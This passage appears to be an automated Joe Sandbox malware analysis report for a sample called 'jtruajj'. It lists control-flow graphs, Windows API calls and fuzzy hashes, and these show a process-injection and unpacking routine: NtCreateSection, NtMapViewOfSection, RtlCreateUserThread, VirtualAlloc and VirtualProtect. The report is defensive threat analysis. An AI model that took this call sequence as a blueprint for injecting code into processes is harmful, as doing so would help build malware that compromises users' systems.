                                                                                                                    • Instruction Fuzzy Hash: 99512AB1900205BFEF209F95CC48FEB7BB8EF85B10F14412AFA12BA1E5D6749945CB24

Control-flow Graph

control_flow_graph 361 401545-40157f call 4011a4 369 401581 361->369 370 401584-401589 361->370 369->370 372 4018a6-4018ae 370->372 373 40158f-4015a0 370->373 372->370 376 4018a4-4018b3 373->376 377 4015a6-4015cf 373->377 379 4018c8 376->379 380 4018b9-4018c4 376->380 377->376 386 4015d5-4015ec NtDuplicateObject 377->386 379->380 382 4018cb-4018ff call 4011a4 379->382 380->382 386->376 387 4015f2-401616 NtCreateSection 386->387 389 401672-401698 NtCreateSection 387->389 390 401618-401639 NtMapViewOfSection 387->390 389->376 393 40169e-4016a2 389->393 390->389 392 40163b-401657 NtMapViewOfSection 390->392 392->389 395 401659-40166f 392->395 393->376 396 4016a8-4016c9 NtMapViewOfSection 393->396 395->389 396->376 398 4016cf-4016eb NtMapViewOfSection 396->398 398->376 401 4016f1 call 4016f6 398->401
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
• Instruction ID: b5c9534ba5f5358dff2a074a80b826bd55324152c05987841a878028393b6fdb
• Opcode Fuzzy Hash: 9036e7d1caaa2f73f8ffe8f81ed6686f8338ecb8473fc941f507ff01140d436f
• Instruction Fuzzy Hash: 94513AB1900245BFEF209F95CC48FEF7BB8EF85B00F14415AF911BA2A5D6749945CB24

Control-flow Graph

control_flow_graph 404 401553-40157f call 4011a4 411 401581 404->411 412 401584-401589 404->412 411->412 414 4018a6-4018ae 412->414 415 40158f-4015a0 412->415 414->412 418 4018a4-4018b3 415->418 419 4015a6-4015cf 415->419 421 4018c8 418->421 422 4018b9-4018c4 418->422 419->418 428 4015d5-4015ec NtDuplicateObject 419->428 421->422 424 4018cb-4018ff call 4011a4 421->424 422->424 428->418 429 4015f2-401616 NtCreateSection 428->429 431 401672-401698 NtCreateSection 429->431 432 401618-401639 NtMapViewOfSection 429->432 431->418 435 40169e-4016a2 431->435 432->431 434 40163b-401657 NtMapViewOfSection 432->434 434->431 437 401659-40166f 434->437 435->418 438 4016a8-4016c9 NtMapViewOfSection 435->438 437->431 438->418 440 4016cf-4016eb NtMapViewOfSection 438->440 440->418 443 4016f1 call 4016f6 440->443
APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
• Instruction ID: 8d6641cc39e0a23de402a6cd7af9a8bcce9404ceaedab19c941a5a8b34b5f284
• Opcode Fuzzy Hash: 7e7aa486a7cba38a24c4655809e077ce32b0d632fdebb8ad14eb01bbdf3cd026
• Instruction Fuzzy Hash: 8C5119B1900205BFEF209F95CC48FEFBBB8EF85B00F14411AFA11AA2A5D6759945CB24

Control-flow Graph

control_flow_graph 447 402ffa-40301e 448 403024-40303c 447->448 449 40313d-403142 447->449 448->449 450 403042-403053 448->450 451 403055-40305e 450->451 452 403063-403071 451->452 452->452 453 403073-40307a 452->453 454 40309c-4030a3 453->454 455 40307c-40309b 453->455 456 4030c5-4030c8 454->456 457 4030a5-4030c4 454->457 455->454 458 4030d1 456->458 459 4030ca-4030cd 456->459 457->456 458->451 461 4030d3-4030d8 458->461 459->458 460 4030cf 459->460 460->461 461->449 462 4030da-4030dd 461->462 462->449 463 4030df-40313a RtlCreateUserThread NtTerminateProcess 462->463 463->449
APIs
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: CreateProcessTerminateThreadUser
• String ID:
• API String ID: 1921587553-0
• Opcode ID: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
• Instruction ID: 67905ead67b615cb9fd2ac39997d468ff33d28dd355ca5d175fe45067cf906e9
• Opcode Fuzzy Hash: be8e4cb5e493dd895ba0f666486257db29135dc3ef83a78b0b3b9a47898ca96e
• Instruction Fuzzy Hash: 8B414732618E0C4FD778EE6CA88966377D5E798351B1643AAD809D3389EE30D85183C5

Control-flow Graph

control_flow_graph 134 6a003c-6a0047 135 6a0049 134->135 136 6a004c-6a0263 call 6a0a3f call 6a0e0f call 6a0d90 VirtualAlloc 134->136 135->136 151 6a028b-6a0292 136->151 152 6a0265-6a0289 call 6a0a69 136->152 154 6a02a1-6a02b0 151->154 156 6a02ce-6a03c2 VirtualProtect call 6a0cce call 6a0ce7 152->156 154->156 157 6a02b2-6a02cc 154->157 163 6a03d1-6a03e0 156->163 157->154 164 6a0439-6a04b8 VirtualFree 163->164 165 6a03e2-6a0437 call 6a0ce7 163->165 167 6a04be-6a04cd 164->167 168 6a05f4-6a05fe 164->168 165->163 170 6a04d3-6a04dd 167->170 171 6a077f-6a0789 168->171 172 6a0604-6a060d 168->172 170->168 174 6a04e3-6a0505 170->174 175 6a078b-6a07a3 171->175 176 6a07a6-6a07b0 171->176 172->171 177 6a0613-6a0637 172->177 188 6a0517-6a0520 174->188 189 6a0507-6a0515 174->189 175->176 179 6a086e-6a08be LoadLibraryA 176->179 180 6a07b6-6a07cb 176->180 178 6a063e-6a0648 177->178 178->171 181 6a064e-6a065a 178->181 187 6a08c7-6a08f9 179->187 183 6a07d2-6a07d5 180->183 181->171 186 6a0660-6a066a 181->186 184 6a07d7-6a07e0 183->184 185 6a0824-6a0833 183->185 191 6a07e2 184->191 192 6a07e4-6a0822 184->192 194 6a0839-6a083c 185->194 193 6a067a-6a0689 186->193 195 6a08fb-6a0901 187->195 196 6a0902-6a091d 187->196 190 6a0526-6a0547 188->190 189->190 197 6a054d-6a0550 190->197 191->185 192->183 198 6a068f-6a06b2 193->198 199 6a0750-6a077a 193->199 194->179 200 6a083e-6a0847 194->200 195->196 201 6a05e0-6a05ef 197->201 202 6a0556-6a056b 197->202 203 6a06ef-6a06fc 198->203 204 6a06b4-6a06ed 198->204 199->178 205 6a084b-6a086c 200->205 206 6a0849 200->206 201->170 208 6a056f-6a057a 202->208 209 6a056d 202->209 210 6a074b 203->210 211 6a06fe-6a0748 203->211 204->203 205->194 206->179 212 6a059b-6a05bb 208->212 213 6a057c-6a0599 208->213 209->201 210->193 211->210 218 6a05bd-6a05db 212->218 213->218 218->197
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006A024D
Strings
Memory Dump Source
• Source File: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6a0000_jtruajj.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: edfa6b35737d46774f892f9e838a511c53124eeea6e349ba935a860513cbf214
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: 0A526874A01229DFDB64CF58C985BA8BBB1BF09304F1480D9E94DAB351DB30AE95DF14

Control-flow Graph

control_flow_graph 446 418770-4188b0 GetModuleHandleW GetProcAddress VirtualProtect
APIs
• GetModuleHandleW.KERNEL32(00513D70), ref: 0041884F
• GetProcAddress.KERNEL32(00000000,0041E298), ref: 0041888C
• VirtualProtect.KERNELBASE(00513BB4,00513D6C,00000040,?), ref: 004188AB
Strings
Memory Dump Source
• Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-3916222277
• Opcode ID: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
• Instruction ID: 2b977b853b8716191c274d39b2deee1532fc6552ce3022b0d9a41b083186e0cb
• Opcode Fuzzy Hash: ff9a43801e185d10054e4e34767694ffcb7e86b2b941098a4c4c71e4807009e3
• Instruction Fuzzy Hash: D8316F18508780CAE301DB79FC257823F6AAB75744F04D0ACD54C8B3B1D7BA5618E36E

Control-flow Graph

control_flow_graph 464 8408f7-840910 465 840912-840914 464->465 466 840916 465->466 467 84091b-840927 CreateToolhelp32Snapshot 465->467 466->467 468 840937-840944 Module32First 467->468 469 840929-84092f 467->469 470 840946-840947 call 8405b6 468->470 471 84094d-840955 468->471 469->468 474 840931-840935 469->474 475 84094c 470->475 474->465 474->468 475->471
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0084091F
• Module32First.KERNEL32(00000000,00000224), ref: 0084093F
Memory Dump Source
• Source File: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_83d000_jtruajj.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: be5306d69ea61fbc5e9f7634e2c491a9b06848746d32d905b8ba5743e169b0e8
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: E8F0C231200318ABE7203AB9988DB6BBAE8FF48721F140529E742D51C1CB70EC058E61

Control-flow Graph

control_flow_graph 477 6a0e0f-6a0e24 SetErrorMode * 2 478 6a0e2b-6a0e2c 477->478 479 6a0e26 477->479 479->478
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,006A0223,?,?), ref: 006A0E19
• SetErrorMode.KERNELBASE(00000000,?,?,006A0223,?,?), ref: 006A0E1E
Memory Dump Source
• Source File: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_6a0000_jtruajj.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: a812bd8a4e5226da291cda7890492f087020d928e330f1a56def5d4e73e5cff5
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 90D0123114512877DB003A94DC09BCD7B1CDF09B62F008451FB0DD9180C770994046E5

Control-flow Graph (rendered graph not included; legend: Executed / Not Executed)
• Basic blocks and edges: 498 40190e-40190f; 499 401912-401963 (call 4011a4, Sleep, call 401426); 500 4018b5-4018ff (call 4011a4); 523 401972-401978; 524 401965-40196d (call 401529); 527 40198e; 528 40197f-40198a; 529 401991-4019bd (call 4011a4). Edges: 498->499, 498->500, 499->523, 499->524, 523->527, 523->528, 524->523, 527->528, 527->529, 528->529
APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: 2faec9f74094ce0f08c74674007c6dc18df4c3c5133ab61c0808bb95c55d4a7d
• Instruction ID: c3efed824753038ef125f202698f45fd900918c8f6410fb3a7b527937a7c5fc5
• Instruction Fuzzy Hash: D811BFB220C204EBEB00AA908C52EAA3754AF05710F248137BA42791F1C57D9A13F75B

Control-flow Graph (rendered graph not included; legend: Executed / Not Executed)
• Basic blocks and edges: 537 8405b6-8405f0 (call 8408c9); 540 8405f2-840625 (VirtualAlloc, call 840643); 541 84063e; 543 84062a-84063c. Edges: 537->540, 537->541, 540->543, 541->541, 543->541
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00840607
Memory Dump Source
• Source File: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0083D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_83d000_jtruajj.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 9db1500acaea3910694f4b77489e2ecb119e3de9b1d077b6176067c5f6bc4e7d
• Instruction Fuzzy Hash: A0113F79A00208EFDB01DF98C985E99BBF5EF08350F058095FA489B361D771EA50DF91
APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
• Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
• Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
• Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
• Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
• Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
• Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
• Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
• Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
APIs
• Sleep.KERNELBASE(00001388), ref: 0040194E
  • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
  • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: CreateDuplicateObjectSectionSleep
• String ID:
• API String ID: 4152845823-0
• Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
• Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
• Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
APIs
• LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
Memory Dump Source
• Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
Similarity
• API ID: AllocLocal
• String ID:
• API String ID: 3494564517-0
• Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
• Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
• Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
APIs
• QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
• HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
• GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
Memory Dump Source
• Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
Similarity
• API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
• String ID:
• API String ID: 2776817195-0
• Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
• Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
• Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
APIs
• BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
Strings
Memory Dump Source
• Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
Similarity
• API ID: BuildCommEnvironmentFreeStrings
• String ID: -
• API String ID: 2991353152-2547889144
• Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
• Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
• Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797